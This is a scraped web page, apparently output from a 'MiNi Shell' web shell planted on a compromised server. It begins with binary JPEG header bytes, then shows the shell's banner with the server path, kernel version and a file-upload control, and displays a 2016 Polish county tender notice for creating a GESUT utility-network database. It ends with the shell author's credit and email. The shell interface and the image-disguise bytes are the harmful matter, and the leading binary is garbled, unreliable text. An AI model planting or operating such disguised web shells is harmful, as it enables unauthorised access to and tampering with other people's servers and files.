JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/91680-N-2016.html

<p class="kh_header"><b>Mielec: Utworzenie inicjalnej bazy danych geodezyjnej ewidencji sieci uzbrojenia terenu (GESUT) dla obszaru powiatu mieleckiego</b><br>
<b>Numer ogłoszenia: 91680 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Mielecki , ul. Wyspiańskiego 6, 39-300 Mielec, woj. podkarpackie, tel. 17 78 00 400, faks 17 78 00 530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://powiat-mielecki.bip.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie inicjalnej bazy danych geodezyjnej ewidencji sieci uzbrojenia terenu (GESUT) dla obszaru powiatu mieleckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest utworzenie inicjalnej bazy danych geodezyjnej ewidencji sieci uzbrojenia terenu (GESUT) dla obszaru powiatu mieleckiego. Zamówienie obejmuje: a) utworzenie inicjalnej bazy danych GESUT w oparciu o materiały zgromadzone w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej (PODGiK) oraz bazę zarejestrowanych i uzgodnionych projektów dotyczących sieci uzbrojenia terenu w Oddziale Uzgadniania Dokumentacji Projektowej (OUDP) dla obszaru powiatu mieleckiego; b) sporządzenie zbiorów metadanych dla bazy danych GESUT; c) przeliczenie wysokości z geodezyjnego układu wysokościowego PL KRON86 NH na PL  EVRF2007  NH, d) aktualizacja działającego w powiecie geoportalu (Mielecki System Informacji Przestrzennej) o bazę GESUT. I. Założenia techniczne i realizacja bazy GESUT. 1. Zleceniodawca wymaga zgłoszenia pracy geodezyjnej w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Mielcu z uwzględnieniem zapisów art. 40a ust.2 pkt. 3 ustawy Prawo geodezyjne i kartograficzne. 2. W ramach zrealizowanego w 2014 roku Mieleckiego Systemu Informacji Przestrzennej, sieci uzbrojenia terenu zostały opracowane obiektowo w oparciu o istniejącą numeryczną mapę zasadniczą wg poprzedniego rozporządzenia z dnia 12 lutego 2013 r. w sprawie bazy danych geodezyjnej ewidencji sieci uzbrojenia terenu, bazy danych obiektów topograficznych oraz mapy zasadniczej (Dz. U. poz. 383). Opracowanie nie obejmowało projektowanych sieci uzbrojenia terenu (ZUDP). Ponadto do bazy wprowadzono tylko te rodzaje atrybutów, które były możliwe do wprowadzenia w oparciu o dane zawarte w mapie numerycznej. 3. Baza prowadzona jest na bieżąco, obiektowo w programie EWMAPA zwanej dalej systemem Starosty w układzie współrzędnych 2000 strefa 7 oraz układzie wysokościowym Kronsztadt 86. 4. Zamawiający w ramach zamówienia nie zamierza zmieniać oprogramowania graficznego, a jedynie uzupełnić i dostosować istniejące dane do wymogów obowiązujących przepisów prawa w prowadzonym systemie Starosty. 5.Zestawienie długości istniejących sieci uzbrojenia terenu przedstawia załącznik nr A (zgodnie ze SIWZ). Wykazane w załączniku sieci należy uzupełnić i doprowadzić do zgodności z obowiązującymi przepisami. 6. Zestawienie długości projektowanych sieci uzbrojenia terenu przedstawia załącznik nr B (zgodnie ze SIWZ). Wykazane w załączniku sieci należy wykazać w inicjalnej bazie GESUT. 7. W celu realizacji przedmiotu zamówienia Wykonawca wykona następujące prace: a) dokona analizy udostępnionych przez Zamawiającego materiałów PZGiK, a także dokumentów przedstawiających usytuowanie projektowanych sieci uzbrojenia terenu znajdujących się w Oddziale Uzgadniania Dokumentacji Projektowej, oraz przetworzy dane i informacje zawarte w tych materiałach do właściwej postaci i struktury, w zakresie niezbędnym do utworzenia inicjalnej powiatowej bazy GESUT; b) utworzy robocze bazy danych zgodne z modelem pojęciowym powiatowej bazy GESUT określonym w rozporządzeniu w sprawie GESUT oraz K GESUT; c) wprowadzi do teleinformatycznego systemu Starosty, pozytywnie zweryfikowane zbiory danych wyeksportowane z roboczych baz danych, o których mowa w pkt b, wykorzystując do tego celu format pozwalający zasilić system Starosty poprzez dostosowanie dotychczasowych danych do wymogów rozporządzenia oraz niepowodujący utraty dotychczasowych informacji na danych wektorowych. W trakcie dostosowywania baz danych oraz zasilania systemu informatycznego Starosty należy, utrzymać historię bazy danych oraz zwrócić szczególną uwagę na zachowanie źródłowych identyfikatorów materiałów zasobu dla obiektów GESUT, oraz dla wszystkich elementów na warstwach tworzących te obiekty; d) Zaktualizuje funkcjonujący w powiecie geoportal o dane bazy GESUT. 8. W przypadku gdy w państwowym zasobie geodezyjnym i kartograficznym brak jest informacji niezbędnych do ustalenia wartości wymaganych atrybutów inicjalnej powiatowej bazy GESUT (atrybutów nieoznaczonych licznością 0  lub stereotypem voidable), Wykonawca uzgodni sposób wypełnienia pól bazy danych w zakresie tych atrybutów z Zamawiającym. Nie zakłada się potrzeby wykonywania geodezyjnych pomiarów terenowych mających na celu pozyskanie danych określających położenie i geometrię inicjalnej powiatowej bazy GESUT. 9. Wykonawca ujawni w inicjalnej powiatowej bazie GESUT podmioty władające sieciami uzbrojenia terenu na podstawie dokumentów udostępnionych Wykonawcy przez Starostę lub informacji ujawnionych w dotychczasowej dokumentacji. Do dokumentów upoważniających ujawnienie w inicjalnej powiatowej bazie GESUT podmiotów władających sieciami uzbrojenia terenu należy zaliczyć w szczególności: a)decyzje o pozwoleniu na budowę, zgłoszenia budowy lub zawiadomienie o zakończeniu budowy sieci uzbrojenia terenu; b) protokoły narad koordynacyjnych, o których mowa w art. 28b ust. 6 ustawy Prawo geodezyjne i kartograficzne, lub dokumenty zgromadzone przez zespoły uzgadniania dokumentacji projektowej, działające do 12 lipca 2014 r. na podstawie przepisów rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 2 kwietnia 2001 r. w sprawie geodezyjnej ewidencji sieci uzbrojenia terenu oraz zespołów uzgadniania dokumentacji projektowej (Dz. U. Nr 38, poz. 455); c) ustaleń i uzgodnień inicjalnej bazy GESUT z właścicielami sieci; d) pisemną informację wynikającą z innych źródeł. 10. Należy przywrócić włazy prostokątne i kwadratowe, na podstawie baz warstw K 1, z przed konwersji dokonanej w roku 2014 (przywrócenie symboliki oraz dodanie odpowiedniego atrybutu obiektu). 11. Uporządkować dane dotyczące włazów, studzienek i komór, które do dotychczasowej bazy zostały przeniesione jako właz. W nowym rozporządzeniu zostało doprecyzowane kiedy stosować właz, kiedy studzienkę, a kiedy komory. 12. Wszystkim obiektom punktowym szambo, dodany został odpowiedni wpis do danych dodatkowych, należy je przenieść do odpowiedniego kodu obiektów i dodać odpowiedni symbol. 13. W czasie tworzenia obiektów z przewodów kanalizacyjnych do danych dodatkowych dodano opis tłoczny. Nowe rozporządzenie dodało taki atrybut  należy go dodać do bazy na podstawie wpisów w danych dodatkowych. 14. Dla przewodów kablowych (telefon, prąd) dla przewodów, które maja liczbę przewodów większą od 1 należy zaznaczyć atrybut wiązka. 15. Przeanalizować inne obiekty pod kątem wartość atrybutu liczba przewodów (atrybut ten jest dopuszczalny tylko dla przewodów kablowych). 16. Dokonać zmiany obrysów przewodów na osie przewodów  dotyczy szczególnie kanalizacji, co i energii. Zgodnie z nowym rozporządzeniem wszystkie przewody mają mieć topologię liniową. 17. Uzupełnić brakujące rury ochronne wykazane w opracowaniu wektorowym na podstawie baz warstw K 1, z przed konwersji dokonanej w roku 2014. 18. Opracować obiektowo dane wektorowe ZUDP zgodnie z rozporządzeniem w sprawie GESUT. Nie należy tworzyć obiektów projektowanych w przypadku zrealizowania obiektu na podstawie informacji zawartej w bazie. 19. Należy zachować dotychczasowe wartości identyfikatora ewidencyjnego materiału bazy GESUT oraz dotychczasowe wartości podstawy zmian na warstwach EWMAPY. Dla nowych obiektów lub aktualizowanych atrybutów przyjąć id materiału jako id zgłoszenia pracy. 20. Bazę danych GESUT należy uzgodnić z podmiotami władającymi sieciami uzbrojenia terenu oraz zaktualizować bazę ewentualnymi udokumentowanymi zmianami. 21. Inicjalną bazę GESUT zainstalowaną przez Wykonawcę w systemie Starosty należy doprowadzić do zgodności pod kątem redakcji mapy oraz nakładania się opisów z danymi prowadzonymi przez Zamawiającego w innych bazach (EGiB, mapa zasadnicza). 22. W ramach prac należy dokonać przeliczenia wszystkich wysokości zawartych w bazach mapy zasadniczej (docelowy GESUT, BDOT500) prowadzonych przez Starostę z układu wysokościowego Kronsztadt 86 na układ Amsterdam 2007. Zamawiający przekaże Wykonawcy, wysokości punktów osnowy wysokościowej w obu układach. 23. Dla danych powstałych w ramach budowy bazy danych GESUT należy sporządzić zbiory metadanych w plikach .xml zgodnych w strukturze z wytycznymi OGC. 24. Całość bazy GESUT musi zawierać niezbędne informacje zgodne z obowiązującymi w tym zakresie przepisami umożliwiające eksport danych w formacie GML oraz eksport w celu zasilenia bazy K-GESUT. 25. Wykonawca obowiązany jest do ujawnienia zmian w inicjalnej powiatowej bazie GESUT wynikających z dokumentów, które wpłyną do organu prowadzącego PZGiK w okresie realizacji przedmiotu zamówienia, udostępnionych przez Zamawiającego nie później niż w dniu wprowadzenia przez Wykonawcę do teleinformatycznego systemu Starosty pozytywnie zweryfikowanych przez Zamawiającego zbiorów danych wyeksportowanych z roboczych baz danych przedmiotu zamówienia. 
26. W ramach prac Wykonawca zaktualizuje funkcjonujący w powiecie geoportal o dane z bazy GESUT. 27. Przed zasileniem baz danych systemu Starosty, Zamawiający dokona kontroli przekazanej wersji cyfrowej wykonanego zamówienia, w przypadku pozytywnej kontroli wyznaczy Zamawiającemu termin zasilenia bazy systemu EWMAPA. Zasilenie systemu EWMAPA nastąpi pod nadzorem upoważnionej osoby. Pozytywna ocena zasilenia systemu EWMAPA dokonana w wyznaczonym terminie stanowić będzie podstawę odbioru całości prac oraz przyjęcia rozliczenia należności za wykonaną pracę. Utworzenie baz danych, obsługiwanych przez system teleinformatyczny funkcjonujący w starostwie powiatowym, stanowi ostatni etap kontroli danych i jest warunkiem podpisania protokołu odbioru przez Zamawiającego. II. Materiały Wynikowe. . Wykonawca przekaże Zamawiającemu: a) dokumentację zawierającą rezultaty prac związanych z utworzeniem inicjalnej powiatowej bazy GESUT w formie analogowej oraz elektronicznej w formacie .jpg z rozdzielczością 300 dpi zgodnie z rozporządzeniem ws. zasobu; b) zbiory inicjalnej powiatowej bazy GESUT w postaci plików zapisanych w formacie GML, zgodnych z obowiązującymi schematami aplikacyjnymi oraz zaktualizowane bazy GESUT w systemie EWMAPA; c) dokumenty zawierające wyniki przeprowadzonych przez Wykonawcę analiz oraz kontroli wewnętrznej. 2. Dane w formie elektronicznej należy przekazać na dysku przenośnym 2,5  USB 3. 0 o pojemności zapewniającej pomieszczenie przekazywanych danych  3 szt. III. Zmiany warunków technicznych. Wszelkie zmiany niniejszych warunków technicznych wymagają formy pisemnej uzgodnionej przez Zamawiającego i Wykonawcę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 72.32.00.00-4, 72.31.60.00-3, 72.31.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości 
3 600,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał:
1. bazę GESUT, o której mowa w art. 4 ust. 1 a ustawy Prawo geodezyjne i kartograficzne, dla minimum 5 jednostek ewidencyjnych (np. miast, gmin),
2. minimum 1 aktualizację geoportalu o dane z bazy GESUT, wraz z załączeniem dowodów, że usługi te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie co najmniej 5 osobami zdolnymi do wykonania zamówienia zatrudnionymi przez Wykonawcę na umowę o pracę, w tym co najmniej 2 geodetami posiadającymi uprawnienia zawodowe w zakresie określonym w art. 43 ust. 1 ustawy Prawo geodezyjne i kartograficzne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż posiada opłacona polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo ustanowione do reprezentowania Wykonawców ubiegających się o udzielenie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Ilość jednostek ewidencyjnych dla których wykonano usługi w okresie 3 lat - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat-mielecki.bip.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mielcu, ul. Wyspiańskiego 6, 39-300 Mielec, pok. nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2016 godzina 11:00, miejsce: Starostwo Powiatowe w Mielcu, ul. Wyspiańskiego 6, 39-300 Mielec, kancelaria ogólna, pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com